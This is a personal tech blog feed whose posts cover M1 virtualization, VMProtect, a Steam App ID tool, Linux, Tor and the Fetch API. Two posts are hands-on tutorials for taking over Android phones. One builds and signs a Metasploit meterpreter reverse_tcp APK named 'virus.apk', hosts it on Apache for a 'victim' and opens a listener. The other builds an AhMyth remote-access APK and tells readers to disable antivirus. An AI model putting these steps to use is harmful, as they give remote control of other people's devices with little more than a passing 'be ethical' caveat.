You may also need to update the command line tools, it should appear an error on the terminal with some instructions, if you’re not using the latest version. If it is a warning just ignore it
Now you can launch the script by making it an executable with chmod +x filename, the other necessary steps are shown in the video
If for some reason during the first setup of Windows 11 you can’t skip the configuration of the Wifi, simply follow this video. It seems that there are many processes running during the first setup, you just need to close the right one and you can finish the setup easily
The last thing to do is to use the remote desktop to get a fullscreen resolution, at the moment there isn’t a better solution to this issue. Follow this video on Youtube for a complete explanation with VMWare Fusion

Now the question might be “Why using the UUP Files instead of the preview file from the Microsoft’s site ?”, well the reason is pretty simple, the vhdx file could get corrupted during the installation of Windows or later. For this reason is better to use an ISO from uupdump. You could also convert the vhdx extension to qcow2 with this command (even in this case the file can get corrupted and you would need recreate it again):

qemu-img convert -p -O qcow2 /path/to/Windows11_InsiderPreview_Client_ARM64_en-us_22483.VHDX /path/to/output/Windows11_InsiderPreview_Client_ARM64_en-us_22483.qcow2

For UTM there’s this video if you want to check, some steps as I said are basically the same.

Parallels

If you want to use Parallels, buy a licence (or at least try before you buy). It’s very simple to create a VM, you just need to select the file in the Finder and Parallels will do the rest, no terminal, no strange tweaks, no drivers to install, nothing. In this video there is an example.

TLDR

QEMU could be too complicate for some users, I managed to get Ubuntu Server working from the terminal but it’s better to use a GUI software so you can avoid many issues instead of setting everything on your own.

UTM could be a good alternative, but unfortunately it’s not fully usable. You could use it to run simple applications, but don’t expect to play games or to do other complex stuff, for that purpose there is Parallels which works much better.

Virtualbox is probably never going to get a release to support the M1 chip, from the moment it’s a general-purpose full virtualizer for x86 hardware, which the M1 or M1X are not part of this.

VMWare Fusion is currently in a technical preview like Parallels was a few months ago, it sure is a good alternative to Parallels but it requires some tweaks to make Windows or another OS work.

This post was simply made to give an overview to everyone who is going to virtualize an OS on an Apple M1 chip, if I would declare a winner, I would choose Parallels, why you may ask ? The answer should be obvious but it’s because of its simplicity and the fact that many features are perfectly working, you can also play 3D games!

Hack an Android device with MSFvenom and Kali Linux

Thu, 03 Jun 2021 00:00:00 +0000

There are different ways and tools to hack an Android device, in this post, I will focus on MSFvenom to generate an APK which will be installed on the target device and the Metasploit console to set up a listener which will be used to interact with the device through the APK installed. Keep in mind that the payload used is not going to work with every Android version, mostly with the recent ones. The main purpose is to show how create a payload and setup a listener, after that we just need to create a server where the victim will download the virus. I found many other tutorials on Google about this topic but they are extremely old and they don’t even tell you the Kali version used. You might think that is not important, but when I was looking to learn how to use MSFvenom, many parameters used were not working. Here is a simple example:

$ msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R > virus.apk

So why this is wrong in the first place ? If we paste this command in our terminal, we get this error:

Error: No options

As you can see something is not correct, more specifically “R” is not recognized as a parameter, technically this should create our APK as an output file, but if we check the official documentation on the Offensive Security website, we can clearly see that the correct parameter to use is “-o":

This is just a simple tip to take these tutorials as they are right now, because after one year they could already be outdated, even this tutorial created by me of course. If something is not working, check the documentation.

Requirements

It should be obvious but these are the tools required:

Kali Linux (the version used is 2021.1)
An Android device (if you do not have an Android phone, use a VM or an emulator like Bluestacks)

You have already installed Kali Linux but you don’t remember the correct version ? No problem, use this command in the terminal:

$ lsb_release -a

And you should get the following output:

No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2021.1
Codename: kali-rolling

Create the payload

Instead of typing 7 different commands in the terminal one by one, we can simply create a shell script to do the job. Open the terminal and use the following command to create a file:

$ touch createThePayload.sh

Make the script created an executable with:

$ chmod +x createThePayload.sh

Copy and paste the following code (of course you have to set your IP and a port like 4444):

##!/bin/sh
msfvenom -p android/meterpreter/reverse_tcp LHOST=YOURIP LPORT=YOURPORT -o virus.apk
keytool -genkey -V -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
sudo apt-get install default-jdk -y
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore virus.apk hacked
jarsigner -verify -verbose -certs virus.apk
sudo apt-get install zipalign -y
zipalign -v 4 virus.apk virus_signed.apk

Type ./createThePayload.sh and hit enter to execute the script, check the output in the terminal to see if everything is correct.

A quick explanation about the commands used

With MSFvenom we set the payload, the host which is our IP, the port and the output as “virus.apk”.

The keytool command is a key and certificate management utility. We set the keystore file to generate, an alias like hacked but you can use what you want just keep in mind this alias when you are using the jarsigner command, the algorithm like RSA, the key size, the validity.

We have to install two packages, default-jdk to use the jarsigner in order to sign and verify a Java Archive, zipalign which is an archive alignment tool that provides important optimization to Android application (.apk) files. We set the parameter “-y” to automatically answer with “yes” to the prompt in the terminal. We need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. Android devices only install signed .apk files.

Setup the server

Now to download the APK on a target machine, we could use a server with Apache, from here we just need to go the correct url, which is something like “192.168.1.2/virus_signed.apk”. In order to move the APK created by the script in “/var/www/html”, we need root permissions. Besides using a command like:

$ sudo virus_signed.apk /var/www/html/virus_signed.apk

You could also use the following command when you know you will be running various commands that need root access and don’t want to run each of them with sudo:

$ sudo -i

Check if the apache2 service is running with:

$ service apache2 status

If you get the following output:

● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active: inactive (dead)
Docs: https://httpd.apache.org/docs/2.4/

Start the service with:

$ sudo service apache2 start

If we open Firefox and type the IP of our machine (you can get the IP with the terminal by typing ifconfig), we get the Debian Page:

And if we search our apk file in the website directory, we can download it:

Setup the listener

And now we have to set our listener with the msfconsole, we set the exploit, the payload and the host. The port is already set as 4444 but you change it. After that we will run it and we will download the apk on a mobile device or an emulator, in my case I used my phone. Follow these steps to set the listener:

Start the msfconsole:

$ msfconsole

When the console is ready, type this command (it should be obvious but don’t copy “msf >” in the terminal):

$ msf > use exploit/multi/handler

Set the host:

$ msf > set lhost TypeYourIPHere

Set the payload:

$ msf > set payload android/meterpreter/reverse_tcp

Run the exploit:

$ msf > run

Download the apk on the phone, you need to make sure that your Kali machine and your Android device are on the same network.

Let’s test some commands

Some commands will not work, but the main purpose of this video is to show how to make this stuff work, you can always change the payload or even make your own payload. Here is a quick demo:

TLDR

With this post you should be able to create a payload for Android, setup a server and a listener to make everything work perfectly. As you can see in the demo, the antivirus is preventing us from installing the APK, in some cases it can also close the connection to our Kali machine. There are other cases where the connection will be closed, unfortunately there isn’t a single solution so you will need to try different approaches. Try to check if the architecture used to create the APK is the same used by Android and of course if the antivirus is preventing the payload to work correctly.

Exploit an Android Device with Ahmyth

Sat, 22 May 2021 00:00:00 +0000

Ahmyth logo from the Github page

I made a video recently where I talked about how to hack an Android device with msfvevnom and Kali Linux. In this post we will use Ahmyth, a tool which is going to create an apk that will be used on a target device to gain remote control.

I will cover the Windows 10 version, keep also in mind that this tool is not going to work on every Android version.

Tools to use and other requirements

To use this tool you just need Java 8 which can be downloaded with the Open JDK. If you already have another Java version installed, you should check in the environment variables of Windows 10, if JAVA_HOME is set correctly. In my case it is the following:

CurrPorts is not required but it will show you if the default port 42474 is not already used by another process. It simply displays the list of all currently opened TCP/IP and UDP ports on your local computer. For example:

Remember to disable the antivirus or to add an exclusion to the file created by Ahmyth, otherwise Windows Defender will simply remove it.

Here you can find the necessary links to download the tools:

Let’s set up everything

It should be obvious but in order to get your IP address on Windows, open the comand prompt, type “ipconfig” and check the value IPV4 Address:

Open Ahmyth and click on APK Builder on the top of the window, set your IP in Source IP and press Build, if everything is correct you should get an output highlighted in green like this:

Now we need to download the apk on the target device, I’m using Bluestacks as emulator but you can use something else. We could just import the file into our emulator, but it would be better to download the file through a server. On Linux you need apache2 to create a server, then we can copy our apk into the following path /var/www/html.

On your Linux terminal type these commands depending where you copied the apk:

To move the file type

$ sudo mv Ahmyth.s.apk /var/www/html

Check if apache2 is not already active

$ service apache2 status

Start apache2 if it is not running

$ sudo service apache2 start

Check the IP Address of the Linux VM, you will use it later

$ ifconfig

Install the apk on the target device

Next thing that we need to do is to download the apk on the target device, let’s open the browser in the emulator by typing the IP found in the Linux VM and the file that we moved into the path "/var/www/html". For example:

Before we install the apk we have to set up a listener with Ahmyth, go to the Victims tab and click on Listen, you should get a console output higlighted again in green:

If everything is correct, you should be able to connect to the victim, let’s see it in action:

TLDR

This was a simple demonstration to exploit an Android device with a tool like Ahmyth, of course this tool is not the best choice because it will be detected by the antivirus very easily and many Android versions are not working with this tool. However some of these features can be cloned in Metasploit to get the same result, it is more complex but who doesn’t love the complex challenges ? And remember, be ethical!

Use VMProtect SDK to protect your application

Sun, 09 May 2021 00:00:00 +0000

If you want to protect your application from a reverse engineering analysis, you may have heard about VMProtect; a tool made to protect your applications using virtualization, the generation and verification of serial numbers, packing, mutation, obfuscation and more. Learn the SDK will help you not only to understand how the protection work, but it will also help you to virtualize only certain areas of code that you want to protect. Let’s say that you have a method which is going to manage a licence for your application, you do not want someone to reproduce your code or to create a keygen to bypass the registration. You can have a good control of your code by using the SDK, keep in mind that the virtualization will impact on the performance, not only that you should use VMProtect on a C or C++ application. On .NET it’s very easy to remove the protection, so keep that in mind.

Prerequisites

This post will focus on how to integrate the VMProtect SDK in a simple console application for the Windows platform. You will need Visual Studio (possibly the most recent release) with the Desktop Development with C++ component installed and the VMProtect Demo version.

Useful links

You can find these links by searching on Google, but I prefered to list them here:

The Project section will list you all the different sections in VMProtect, in particular you should check the Options section which will explain to you the different features that you can use in more detail.

Buy an edition if you are going to distribute your application

The demo version is enough for this walkthrough, but you will need to purchase the right edition if you want to distribute your application without this pop-up:

Besides this annoying pop-up, there are other things to consider, if we navigate to the FAQ page on the VMPprotect website, there is an interesting question and an interesting answer:

Files protected with the demo version are detected as suspicious. Why?

The demo version is public and bad guys try to use it for protecting malware. That’s why sometimes antivirus applications detect files protected by the demo. This usually doesn’t happen with the full version of VMProtect which has completely different protected code structure.

Do you really want to protect your application in the best way ? Buy a licence.

Do you want to avoid spending money and distribute your application in any case ? Reconsider to buy a licence.

There is also a comparison chart to help you choose the right edition.

Set up the C++ project

There are different ways to set up a C++ project, I prefered to keep everything in the same folder without the need to install VMProtect on different systems but you are free to do as you wish.

First of all, open Visual Studio and create a Console Application in C++, if you already installed the VMProtect Demo, navigate to the following path “C:\Program Files\VMProtect Demo”. There are three files that we need and these files are located in two different directories:

“Include\C” copy VMProtectSDK.h into your project;
“Lib\Windows” copy VMProtectSDK64.lib and VMProtectSDK64.dll into your project, make sure to set the Content property to true for the dll:

Why you need to copy VMProtectSDK64.dll in the first place ? Because the application can’t work without this dll from the moment it contains the functions that we are using in our project. The structure should be something like this, depending on how you set up the project:

The code that I used is the following but you are free to change or to use what you want:

#include <iostream>
#include "VMProtectSDK.h"
#include <Windows.h>

int main()
{
VMProtectBegin("main");
::ShowWindow(::GetConsoleWindow(), SW_HIDE);
if (VMProtectIsProtected()) {
MessageBox(
NULL,
(LPCWSTR)L"THIS IS PACKED",
(LPCWSTR)L"Unpackme",
MB_ICONINFORMATION | MB_OKCANCEL | MB_DEFBUTTON2
);
}
else
{
MessageBox(
NULL,
(LPCWSTR)L"THIS IS UNPACKED",
(LPCWSTR)L"Unpackme",
MB_ICONINFORMATION | MB_OKCANCEL | MB_DEFBUTTON2
);
}
VMProtectEnd();
return 0;
}

A quick analysis about the functions used

We start to invoke the function VMProtectBegin and we pass a string which is the name of a method, the main in this case, it will simply identify the beginning of the protected area of the code. It is better to use the function name, otherwise there will be a duplicate name conflict.

VMProtectEnd marks the end of the protected area of the code and VMProtectIsProtected will check if our application is protected or not.

Compile the project and create the protected file

Set the platform to x64 and the configuration to Release just like this:

After you compiled the project, open VMProtect Demo and select the output file that has been generated by Visual Studio. You can simply check the output path when you compile the project to find it quickly:

On the left bar under Functions for Protection there is a folder and an entry named VMProtectMarker “main”, if we click on this entry we can see the code, the Compilation Type and other records:

Let’s pack the file by clicking on the following icon:

Let’s check if the file is protected

A new file has been created in the directory where the unpacked file was compiled, if we execute these two files, we get two different messages:

It appears to be correct but we could check in IDA Pro if our code is virtualized, as soon as IDA loads the file we can clearly see from the graph view that something is not right. There are a lot of useless instructions repeated continuosly so this is clearly a sign about a possible virtualized code:

TLDR

From now you should have a clear view about how to use the VMProtect SDK in your project and how this stuff is working. On another OS the process is literally the same, remember to buy an edition if you are going distribute your application from the moment it removes some limitations like the antivirus detection.

Gimme The Steam App Id By Name a tool made with .NET Framework

Sat, 10 Apr 2021 00:00:00 +0000

So the first question might be, why did you make a program like this ? Well there are different reasons that you could have to get the Steam APP ID, many websites use this ID to print data about a game. Even on the Steam website you can use the ID to search for a game in the store, another reason about why I made this tool is because it was a little bit challenging to implement on a Windows Forms application. You can find the source code on Github.

The JSON body contains all the available games on Steam

The following GET Request contains exactly 113347 records, it would not be very smart to call every time we press a button this request instead I prefered to call it only one time when I needed to open the program before the InitializeComponent() call in the constructor.

Code overview

This is the Form code:

using Newtonsoft.Json;
using Newtonsoft.Json.Linq;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Linq;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
using System.Windows.Forms;
namespace SteamAppIdIdentifier
{
public partial class SteamAppId : Form
{
protected DataTableGeneration dataTableGeneration;
public SteamAppId()
{
dataTableGeneration = new DataTableGeneration();
Task.Run(async() => await dataTableGeneration.GetDataTableAsync(dataTableGeneration)).Wait();
InitializeComponent();
}
private void SteamAppId_Load(object sender, EventArgs e)
{
dataGridView1.DataSource = dataTableGeneration.DataTableToGenerate;
}
private void btnShowAll_Click(object sender, EventArgs e)
{
searchTextBox.Text = string.Empty;
((DataTable)dataGridView1.DataSource).DefaultView.RowFilter = string.Format("Name like '%{0}%'", searchTextBox.Text);
}
private void btnSearch_Click(object sender, EventArgs e)
{
try
{
((DataTable)dataGridView1.DataSource).DefaultView.RowFilter = string.Format("Name like '%{0}%'", searchTextBox.Text.Replace("'", "''"));
}
catch (Exception ex) { }
}
}
}

This is the code that deserializes the JSON and generates the Data Table which will be used to show the Grid View content:

using Newtonsoft.Json;
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Linq;
using System.Net.Http;
using System.Text;
using System.Threading.Tasks;
namespace SteamAppIdIdentifier
{
public class DataTableGeneration
{
private DataTable dataTable;
public DataTableGeneration() { }
public async Task<DataTable> GetDataTableAsync(DataTableGeneration dataTableGeneration) {
HttpClient httpClient = new HttpClient();
string content = await httpClient.GetStringAsync("https://api.steampowered.com/ISteamApps/GetAppList/v2/");
SteamGames steamGames = JsonConvert.DeserializeObject<SteamGames>(content);
DataTable dt = new DataTable();
dt.Columns.Add("Name", typeof(String));
dt.Columns.Add("AppId", typeof(int));
foreach (var item in steamGames.Applist.Apps)
{
dt.Rows.Add(item.Name, item.Appid);
}
dataTableGeneration.DataTableToGenerate = dt;
return dt;
}
#region Get and Set
 public DataTable DataTableToGenerate{
get { return dataTable; } // get method
 set { dataTable = value; } // set method
 }
#endregion

#region JSON Properties
 public partial class SteamGames
{
 [JsonProperty("applist")]
public Applist Applist { get; set; }
}
public partial class Applist
{
 [JsonProperty("apps")]
public App[] Apps { get; set; }
}
public partial class App
{
 [JsonProperty("appid")]
public long Appid { get; set; }

 [JsonProperty("name")]
public string Name { get; set; }
}
#endregion
 }
}

Use Wait() to block the Thread

This is not very recommend because it blocks the current Thread, but in this case to stop the application from loading the entire UI, this was exactly what I needed. Not only that, the function used to generate the Data Table needed to be async, from the moment the HTTP Get can extract more than 100k records.

More info are available on the Microsft docs about the Wait() method.

Generate the JSON properties with quicktype

An example of a JSON body used is the following:

{
"applist": {
"apps": [
{
"appid": 216938,
"name": "Pieterw test app76 ( 216938 )"
},
{
"appid": 660010,
"name": "test2"
},
{
"appid": 660130,
"name": "test3"
},
{
"appid": 1118314,
"name": ""
},
{
"appid": 1083100,
"name": "Zaccaria Pinball - Tropical 2019 Table"
}
]
}
}

There is a collection called apps which is nested into applist, if we paste the code on the quicktype editor, we get this:

Which is exactly what we need to use to get the Name and the APP ID from the JSON Body without using Dictionaries, Enumerables etc.

Filter the data inside the Grid View

So far so good, we generated the Grid View based on the JSON Body but there are too many rows to view, it would be better to filter these rows. We could use the RowFilter property to do this, besides using a button to restore the rows that we filtered:

private void btnShowAll_Click(object sender, EventArgs e)
{
searchTextBox.Text = string.Empty;
((DataTable)dataGridView1.DataSource).DefaultView.RowFilter = string.Format("Name like '%{0}%'", searchTextBox.Text);
}
private void btnSearch_Click(object sender, EventArgs e)
{
try
{
((DataTable)dataGridView1.DataSource).DefaultView.RowFilter = string.Format("Name like '%{0}%'", searchTextBox.Text.Replace("'", "''"));
}
catch (Exception ex) { }
}

Let’s try to search some of these IDs on the Steam Store

One last we thing that I would like to try is to search a game by name, then I can copy its ID and paste it in the browser to see if it’s correct. The Steam Store should load the correct page, let’s try with Dota 2:

Copy the ID 570 and append it to the following url https://store.steampowered.com/app/ right after app/ you should get something like this:

Screenshot made from the Steam Store Page

If we press the Show All button the search bar becomes empty and we restore the Grid View:

TLDR

I made this post not only to show my tool, but also to show I approached some problems and how to use some of the Steam APIs which are always useful to learn. You should now have a good overview about the Steam APIs and how to create a Windows Forms application for this kind of purposes.

Why you should switch to Linux

Sun, 24 Jan 2021 00:00:00 +0000

After many years of using Windows, I dediced to switch to Linux for many reasons and I recommend to everyone to do the same. I wrote this post not only to share my thoughts but also to dispel a few myths, this is my personal opinion, everyone can argue about these thoughts.

Linux is better for programming

If you are not specifically programming with the .NET Framework which only works on Windows, all the other programming languages like C, C++, Java, Python etc. will work flawlessly on Linux. You type a simple sudo apt install packagename and you get everything ready in your terminal, no need to Google the installer and go through the installation process. On Windows some installers like Python, gives you the options to set automatically the environment variables on your machine, in this way you can call the command python from your CMD. In other cases this does not happen, you need to do everything manually step by step.

Another thing that I really dislike in Windows is the CMD, let’s take as an example the Python installer again, if you have the CMD opened and you type python after setting the environment variable, this is not recognized, unless you open another CMD or you install a package manager like Chocolatey and type refreshenv . I found a tool like the Powershell really useful when you are programming with the .NET stack but in all other cases is not like the Linux terminal.

Speaking of the C language, programming on Windows is a nightmare, yes you can use Visual Studio but you need to set up an entire IDE and you can’t use some C libraries missing many functionalities.

Linux is faster and more secure than Windows

Linux is more powerful, versatile and light-weight, you will notice a significant improvement in speed on a Linux distro when you start working with it.

It is more secure from the moment is open source, everyone can contribute to the code to improve it and someone will find a vulnerability long before hackers can target a Linux distro.

Installing Linux is hard!

Let’s say that you have a PC without Windows, an empty SSD and you want to install Ubuntu, the process is really simple and straightforward from the moment you do not need to partion correclty the disks. It’s just like a simple installation like on Windows with a step by step on the screen, nothing more.

Installing Linux in Dual Boot is not hard but you need to understand how it works, before UEFI was introduced, installing an OS like Ubuntu was a piece of cake on a Legacy Bios, now many things have changed and you need to pay attention in order to avoid some issues.

When I was looking a good guide about how to install Ubuntu alongside Windows 10, I didn’t find a tutorial where the author was creating an EFI partition. If you don’t manually partition the disks, Grub will edit the EFI partition on Windows 10. Let’s say that you want to remove Ubuntu, if you delete its partition from Windows 10 and you reboot nothing will work because Grub was the Windows 10 bootloader. Don’t get me wrong, you can do whatever you want but it’s not better to create a separate EFI partition for Ubuntu and leave Windows 10 alone ? In this way you can boot in Windows without using Grub from the UEFI boot menu, everything is reversible simply by removing the Linux UEFI listing from your UEFI/BIOS settings.

It’s still too complicated, I will unplug my SSD!

Well congratulations you just harmed your hardware! Seriously don’t do this, check this link for a complete explanation.

Linux is made for the expert users!

Wait wait, who told you this lie ? Linux is made for everyone, there are so many distributions for a beginner like Ubuntu, Linux Mint, Pop!_OS, Elementary OS to name a few. On Ubuntu you can simply install applications with the Ubuntu Store without touching the terminal, of course if you want to install applications which are not listed in the store you have to use the terminal. There are many guides about how to learn the Linux commands, I recommend this one.

It isn’t better install Linux with VBox or VMware ?

It depends what you want to do, if you are going to test some commands that could break the OS or you simply want try some features, the answer is yes. If you want to use it for programming, playing videogames or everything else, the answer is no. Keep in mind that in a VM you will lose many resources that your OS could use, in this case I would recommend to install Linux on your computer without missing anything.

But I am a gamer and Linux is not fully supported to play Windows games!

Seriously another big lie that someone told you. Speaking of Ubuntu based distros, you have everything that you need to play a game, the graphics drivers ? No problem you can install them during the installation:

You have many ways to play Windows games on Linux, there is Protondb which is integrated with the native Steam client, Lutris, Playonlinux, Minigalaxy, Gamehub to name a few.

What about the other Windows programs ?

You can use Wine which is a compatibility layer capable of running Windows applications. Of course you should check on the official AppDB to see which programs are compatible, this is also a good reason to keep Windows 10, not everything is going to work.

TLDR

As you can see Linux opens new opportunities to every user, I learnt so many things in a couple of days but there is still more to learn. Don’t be afraid to install Linux and follow different guides to see which one is the best, I would recommend to follow this guide on AskUbuntu which is well explained.

Install Tor on Kali Linux

Mon, 21 Oct 2019 00:00:00 +0000

I am big fan of open source, one of my favourite Linux distros is Kali Linux. It is designed for penetration testing, I used it for several years but I still have more things to learn. It helped me to understand more about penetration testing and the different tools used to hack different systems. Many tools require root privilegies and on Kali you are permanently logged in as root, for security reasons you can’t use Tor if you have administrator privilegies.

It is easy to install Tor, why make a post for this topic ?

Well not really, it depends how you install it, of course there is a dedicated package, you just need to type apt install tor, but the Tor docs don’t recommend to do this. The reason is because the distro repositories are not updated to the latest Tor version, so they are not very reliable.

Kali is particular as distro, it is not easy to use, everything you are going to do requires a big knowledge of Linux terminal. I faced many problems that put my skills to the test and sometimes it’s very hard to figure out what is the real problem.

Why is Tor so important ?

As mentioned on the offical page, Tor protects you against a common form of Internet surveillance known as traffic analysis, which can be used to infer who is talking to whom over a public network. In other words some people can know behavior and interests, so this is the main reason about why you should use Tor.

First option

This is the easiest way to install Tor but as I mentioned before, the Tor documentation says clearly to not use this method because you are downloading untrustable and obsolete versions. I will show in the next paragraph the second method:

$ sudo add-apt-repository ppa:webupd8team/tor-browser
$ sudo apt update
$ sudo apt install tor

Second option

This is the recommended method to use, visit the Tor website and choose a Debian version, I am using the stable one, copy the following lines and paste them in this file "/etc/apt/sources.list"

deb https://deb.torproject.org/torproject.org stretch main
deb-src https://deb.torproject.org/torproject.org stretch main

In order to avoid file certification problems, you need to import the GPG keys, copy and paste those two lines in the terminal:

$ curl https://deb.torproject.org/torproject.org/A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89.asc | gpg --import
$ gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | apt-key add -

Run the following commands to keep your current signing key:

$ apt update
$ apt install tor deb.torproject.org-keyring

Create another user

From the moment on Kali you are always logged in as root, Tor can’t work, you need to use the adduser command to add a new user to your system, replace myNewUsername with the user that you want to create:

$ adduser myNewUsername

Set the new password for the user and run the following command to switch:

$ su - myNewUsername

Check if the tor service is working

Run the following commands to check if Tor has been installed correctly:

$ sudo service tor start
$ service tor status

The status should be set to Active(running), to stop it type:

$ sudo service tor stop

TLDR

Tor will help you to stay anonymously online along with DuckDuckGo, but there are some rules to respect in order to prevent IP leak, but that’s another story.

As Tor is a hidden network so you may come across a few sites that are illegal or promote shady/illegal activities. Try to stay away from these kind of websites.

Fetch API, a good alternative to Ajax and jQuery

Fri, 06 Sep 2019 00:00:00 +0000

The Fetch Api offers you a simple way to make any kind of request you wish to do using Javascript. The Fetch code I am going to show you, works with Node.js or a browser console, in other words you do not necessarily need to install Node.js and the Fetch package on your computer to get the code work. If you decide to use the browser console you do not need to import the module, in this post I show how to implement the code with Node.js.

Working with Node.js

The first thing you need to do is install Node.js, when the installation is complete open the command line and navigate to the path where you want launch your script. If you are using Linux or Mac type ls to display the files in the current directory, on Windows type dir, use cd to change directory, it works on every OS. After that launch the following command:

$ npm install node-fetch

Get request

Create a file named get.js, copy and paste the following code:

var fetch = require("node-fetch");
fetch("https://api.github.com/users/MalwareWerewolf")
.then(response => response.json())
.then(data => {
console.log(data)
}).catch(error => console.error(error));

Launch the js file from the command line:

$ node get.js

You should get the following output in the terminal (or something similar at least):

{
login: "MalwareWerewolf",
id: 43040746,
node_id: "MDQ6VXNlcjQzMDQwNzQ2",
avatar_url: "https://avatars2.githubusercontent.com/u/43040746?v=4",
gravatar_id: "",
url: "https://api.github.com/users/MalwareWerewolf",
html_url: "https://github.com/MalwareWerewolf",
followers_url: "https://api.github.com/users/MalwareWerewolf/followers",
following_url: "https://api.github.com/users/MalwareWerewolf/following{/other_user}",
gists_url: "https://api.github.com/users/MalwareWerewolf/gists{/gist_id}",
starred_url: "https://api.github.com/users/MalwareWerewolf/starred{/owner}{/repo}",
subscriptions_url: "https://api.github.com/users/MalwareWerewolf/subscriptions",
organizations_url: "https://api.github.com/users/MalwareWerewolf/orgs",
repos_url: "https://api.github.com/users/MalwareWerewolf/repos",
events_url: "https://api.github.com/users/MalwareWerewolf/events{/privacy}",
received_events_url: "https://api.github.com/users/MalwareWerewolf/received_events",
type: "User",
site_admin: false,
name: "",
company: "",
blog: "https://www.linkedin.com/in/davidedolce/",
location: "Torino Italia",
email: null,
hireable: null,
bio: "",
public_repos: 6,
public_gists: 0,
followers: 2,
following: 3,
created_at: "2018-09-06T15:07:27Z",
updated_at: "2019-03-02T19:08:51Z"
}

Token authorization

I am using my own Get request, you do not need to create it because the process is the same for other kind of Get request, obviously it depends what you want to do. Create a file named getToken.js and copy and paste the following code:

var fetch = require('node-fetch');
fetch("http://localhost:5000/api/token", {
credentials: 'include'
headers: { //define the headers
 "Authorization": "Bearer myPersonalToken" //change myPersonalToken to another valid token
 }
}).then(res => res.json()).then(response => console.log('Success:' JSON.stringify(response))).catch(error => console.error('Error:', error));

Post request

I created a Post request here, you need to change body content, create a file named post.js and copy and paste the following code:

var fetch = require('node-fetch');
fetch("http://localhost:5000/api/token", {
method: "post", //type of request
 headers: {
"Content-Type": "application/json"
},
body: JSON.stringify({ //this is where you put your json body, with a key and a value the request should receive from the response
 username: "mario",
password: "secret"
})
}).then(res => res.json()).then(response => console.log('Success:', JSON.stringify(response))).catch(error => console.error('Error:', error));

Syntax explaining

As you can see the syntax is very simple, you import the module at the top of your file, then you use the fetch variable to call the function with a url as parameter. You use the keyword then for handling the data you get from the api and the catch keyword to handle exceptionts that the server could return. Here is an example to help you remember really well the syntax:

fetch(url) //call the fetch function and pass a url
 .then(function() {
// handle the data from the api
 })
.catch(function(){
// handle any kind of exception
 })

TLDR

There are other ways to do these kind of requests, but now you should have a clear idea about how to implement them. Unfortunately not all browsers are supporting Fetch, but it still remains a good alternative not only to jQuery and Ajax but even to XMLHttpRequest.

Visit the MDN web docs and Github.io for more info.